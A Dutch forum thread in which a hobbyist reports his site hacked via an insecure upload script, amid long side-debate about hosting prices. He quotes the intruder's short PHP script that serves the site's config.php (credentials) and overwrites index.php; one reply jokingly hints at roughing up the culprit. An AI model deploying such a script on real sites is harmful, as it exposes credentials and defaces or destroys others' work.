site gehackt.
Edit:
Topic gaat niet specifiek over php, daardoor verplaatst naar de koffiehoek.
moderator: Danny Roelofs
Topic gaat niet specifiek over php, daardoor verplaatst naar de koffiehoek.
moderator: Danny Roelofs
Gewijzigd op 01/01/1970 01:00:00 door Eric
Eens bellen naar de host? Of het lijkt een gratis accountje. Heeft hij niet gewoon je index.php (.html) vervangen?
Zie je wel vaker bij zulk soort hosts. Ik raad je aan een betaalde host te nemen.
Jah tegen woordig heb je voor 100 euro per jaar al een leuke hosting!
www.antagonist.nl, zeer weinig downtime :D mischien alternatief..?
wat dacht je van 25 euro, 3 gb hd, 60 gb traffic. domeinnaam(nee geen reclame, gewoon aanbeveling) robin schreef op 15.06.2007 19:26:
whhahahahahahaha Hafohumor!!! xD.
Ermmmm.... en jij trekt natuurlijk zo 100 euro uit je achterzak?
Je hebt al dingen vanaf 5 euro man, waar een simpele site meer dan voldoende aan heeft
Ik praat over per jaar. :D
Luke ook
robin schreef op 15.06.2007 21:06:
Ik betaal nog géén 28 euro per jaar..
8 GB trafic
150 MB webruimte
Uitstekende support
...
Je kan voor dat geld veel beter krijgen :S
ja dat lijkt me wel ja zet anders een eigen server op :P:P
menno schreef op 15.06.2007 21:11:
Kun je er dan ook even bij vertellen wat jouw definities van goed en slecht zijn?Nou dat is best wel slecht :S
En bedenk ook, je weet pas of je een goede hostingprovider hebt, als alles goed fout is gegaan. Wanneer hij de boel dan in no-time weer online heeft, dan heb je een goede provider. De meeste knakenboeren geven echter niet thuis wanneer de boel in het 100 loopt...
als de host providers hun goede naam wilen behouden of krijgen dan zullen ze eigenlijk wel moeten.... vind ik maarja of ze het doen is ten 2de natuurlijk..
Marco schreef op 15.06.2007 21:24:
Doen en kunnen, zijn 2 totaal verschillende zaken! Zolang een server draait, heb je geen enkele kennis nodig om de boel online te houden. Stort de boel echter in, dan wordt het een ander verhaal... Bij menig provider ontbreekt de benodigde kennis en kunde om een server goed te beheren. Daarnaast ontbreken noodprocedures of worden deze nooit getest.als de host providers hun goede naam wilen behouden of krijgen dan zullen ze eigenlijk wel moeten.... vind ik maarja of ze het doen is ten 2de natuurlijk..
Voor een paar euro in de maand kun je niet verwachten dat je een provider met royale service en kunde inhuurt. Bestaat gewoon niet, de kosten liggen namelijk veel hoger. Voor een hobby-site maakt dat echter niet uit, dan is 1 euro per maand een mooi goedkope hobby!
Veel plezier
PHP Newbie schreef op 15.06.2007 21:08:
- 8 GB trafic
- 150 MB webruimte
- Uitstekende support (Echt uitstekende, problemen over het algemeen dezelfde dag opgelost)
...
robin schreef op 15.06.2007 21:06:
- 8 GB trafic
- 150 MB webruimte
- Uitstekende support (Echt uitstekende, problemen over het algemeen dezelfde dag opgelost)
...
- Noodstroomvoorziening
- Je wordt overal van op de hoogte gehouden
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld.
- Support medewerkers met kennis van zaken
- weinig downtime
- Fallback (mail)servers
Voor al dit vind ik zelf dat ik zeker niet teveel betaal...
Namen zijn, Jurgen en Leon.
Jurgen heeft het volgende script geschreven:
Code (php)
1
2
3
4
5
6
7
8
9
10
2
3
4
5
6
7
8
9
10
<?header('Content-Type: application/octet-stream');
readfile("../../config.php");
$file = 'index.html';
$newfile = '../../index.php';
if (!copy($file, $newfile)) {
echo "failed to copy $file...\n";
}?>
readfile("../../config.php");
$file = 'index.html';
$newfile = '../../index.php';
if (!copy($file, $newfile)) {
echo "failed to copy $file...\n";
}?>
hierop reageerde mijn provider op: Hi there ,
It appears they used some upload script you had installed , to upload there php script (into /upload/images) , then from there they ultimately had control of your webspace (as they could upload php scripts to it.. )
Log file attached .
Regards
YourSupportGroup.com
A member of the Byethost Internet Group
(ik zet het log er niet op vanwege de privacy)
-----------------------------
Jurgen zei later tegen mij dat hij in mijn config. php keek om ervan te leren dat het beter beveiligd moet worden. Echter heeft hij het config.php inhoud door gestuurd naar Leon. Leon heeft vervolgens ALLE mappen en scripts veranderd, waardoor ik nu echt alles kwijt ben. Leon beweert dat hij nog een backup van de scripts heeft gemaakt, maar die wil hij niet teruggeven.
Als ik het goed begrijp is Leon toch strafbaar bezig en Jurgen toch ook? Nog erger, deze mensen ken ik, ze waren mijn vrienden./
PHP Newbie schreef op 15.06.2007 23:14:
- Noodstroomvoorziening Logisch. Zonder dat mag je jezelf niet eens host noemen vind ik.
- Je wordt overal van op de hoogte gehouden Ook logisch lijkt mij.
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld. Dat moeten ze van tevoren melden en niet achteraf.
- Support medewerkers met kennis van zaken Is altijd moeilijk in te schatten. Je komt daar eigenlijk alleen achter als je er zelf veel verstand van hebt.
- weinig downtime Ook logisch.
- Fallback (mail)servers Geven vaak meer problemen dan voordelen.
- Onderhoud gaat meestal gepaard zonder downtime. Is dit wel gebeurd, wordt dit aan je verteld. Dat moeten ze van tevoren melden en niet achteraf.
- Support medewerkers met kennis van zaken Is altijd moeilijk in te schatten. Je komt daar eigenlijk alleen achter als je er zelf veel verstand van hebt.
SanThe schreef op 15.06.2007 23:39:
PHP Newbie schreef op 15.06.2007 23:14:
- Noodstroomvoorziening Logisch. Zonder dat mag je jezelf niet eens host noemen vind ik.
SanThe, dit valt bij een hoop hosters toch nog altijd vies tegen. En die fallback mailservers werken uitstekend :-)
Hopelijk heb je hier iets van geleerd: Het grote boze internet vereist goede beveiliging!
En verder: Je zou eens bij de politie aangifte kunnen doen. Het is alleen afhankelijk van de locale kennis en kunde of ze er ook iets mee gaan doen. Leon vraagt overigens wel om een kleine persoonlijke verbouwing... Maar dat heb ik natuurlijk niet gezegd, dan ben jij namelijk net zo strafbaar!
Ps. Ga lekker verder klooien met PHP, maar zet geen belangrijke data op jouw server wanneer je niet zeker weet of je de beveiliging goed op orde hebt. En van je fouten leer je, vergeet dat vooral niet.
is het dan verbeterd dat ik mijn config.php voortaan bijvoorbeeld verander in configlalajekomtertochnietachter.php ??:P
Jurgen